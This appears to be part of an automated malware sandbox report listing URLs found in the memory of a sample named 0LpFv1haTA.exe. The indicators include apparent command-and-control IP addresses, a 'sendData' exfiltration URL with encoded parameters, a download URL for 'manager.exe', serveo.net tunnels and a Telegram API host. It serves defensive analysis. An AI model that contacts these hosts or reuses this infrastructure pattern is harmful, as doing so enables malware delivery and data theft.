                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://123.30.140.234:9080
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                      Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F11276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:21325/enumerate
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ECD000.00000004.00000800.00020000.00000000.sdmp, helloworld.txt.13.drString found in binary or memory: http://127.0.0.1:7634/
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.174.113:8090
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.138.249
                      Source: 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.138.249:8080
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.138.249:8080/%4B%37%49%76%48%5F%61%6C%66%6F%6E%73%40%30%35%31%38%32%39%5F%72%65%70%6F%
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.138.249:8080/K7IvH_user
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.138.249:8080/K7IvH_user%40051829_report.wsr
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.99.138.249:80802
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.9.149.76:8051
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.80.130:80
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:80
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080
                      Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F1126B000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.253.7.60:8080
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.00000194599E7000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234B77000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B146F000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B36F000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB509F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.253.7.60:8080/
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.253.7.60:8080//sendData
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.253.7.60:8080//sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&u
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.00000194599E7000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234B77000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B146F000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B36F000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB509F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.253.7.60:8080/8
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449E5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.253.7.60:80802
                      Source: 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB5081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.80.128.17/manager.exe
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.120.242.78:8817
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.5.152.106:8080
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.78.55.47:8080
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.120.7.24:54321
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.109.146:80
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.12.151.253:80
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.60.191.38:80
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.87.207.180:9090
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.184.180.226:8080
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.82.65.63:80
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.96.78.224:8080
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.178.38.93:8080
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.42.56.128:80
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.110.16:9999
                      Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F11276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8f7482867cc6a5aec99ead5e72d7016e.serveo.net:7634//8f7482867cc6a5aec99ead5e72d7016e.serveo.net
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459A18000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234BA8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1499000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B399000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB50C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.147.179:80
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449EA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line?fields=query
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234D9A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B16AB000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B5AB000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB52DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459D3D000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E44A0CF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234EDF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B17CF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B6CF000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB53FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449D41000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000028.00000002.2641351062.0000019234D9A000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002E.00000002.3233983836.000001B2B1796000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000002F.00000002.3893032426.000002898B696000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 00000030.00000002.4469246851.000001ADB53C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                      Source: 0LpFv1haTA.exe, 0LpFv1haTA.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                      Source: Amcache.hve.36.drString found in binary or memory: http://upx.sf.net
                      Source: 0LpFv1haTA.exe, 00000007.00000002.4566779451.0000021F1126B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0bdcbb891d3c57c2a3bd914febf5955f.serveo.net
                      Source: ssh.exe, 00000018.00000002.4563439205.0000020D735FC000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000018.00000002.4563439205.0000020D73660000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000018.00000003.3449996939.0000020D735FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://0bdcbb891d3c57c2a3bd914febf5955f.serveo.net/
